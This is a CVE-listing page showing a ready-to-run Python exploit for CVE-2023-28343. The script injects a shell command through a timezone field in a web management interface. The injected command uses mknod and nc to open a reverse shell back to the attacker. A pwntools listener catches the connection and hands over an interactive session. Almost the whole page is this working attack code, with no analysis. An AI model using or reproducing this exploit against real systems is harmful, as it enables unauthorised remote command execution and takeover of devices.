4837 Total CVEs
26 Years
GitHub
Home / 2023 / CVE-2023-28343
README.md
Rendering markdown...
POC / exploit.py PY
⬇ Raw GitHub ✕ Close 
#!/usr/bin/python3
import requests
import argparse
import json
from pwn import *

def exploit(target,localhost,localport):
    url = f'{target}/index.php/management/set_timezone'

    headers = {
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'X-Requested-With': 'XMLHttpRequest',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36',
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
        'Origin': f'{target}',
        'Referer': f'{target}/index.php/management/datetime',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'en-US,en;q=0.9',
        'Connection': 'close'
    }

    data = {
        'timezone': f'`mknod /tmp/pipe p;/bin/sh 0</tmp/pipe | nc {localhost} {localport} 1>/tmp/pipe`'
    }

    try:
        response = requests.post(url, headers=headers, data=data, timeout=3)
    except:
        pass

def get_external_ip():
    endpoint = 'https://ipinfo.io/json'
    response = requests.get(endpoint, verify = True)

    if response.status_code != 200:
        return 'Status:', response.status_code, 'Problem with the request. Exiting.'
        exit()

    data = response.json()

    return data['ip']

if __name__ == "__main__":

    ## parse argument
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", action="store", help="Target url, http://localhost:9000", default=False, required=True)
    parser.add_argument("-l", "--localhost", action="store", help="Local IP address for reverse shell", default=False)
    parser.add_argument("-p", "--localport", action="store", help="Local port for reverse shell", default="443")
    args = parser.parse_args()
    
    if args.target is not False:

        if args.localhost is False:

            # get external ip address for listener
            try:
                args.localhost = get_external_ip()
            except:
                print("Not able to get external IP address")
                sys.exit(1)

        # running listener
        l = listen(args.localport)

        # sending exploit payload
        exploit(args.target,args.localhost,args.localport)
        
        # waiting for a reverse connection
        try:
            s = l.wait_for_connection()
            s.interactive()
        except:
            pass
        finally:
            l.close()

    else:
        parser.print_help()
        parser.exit()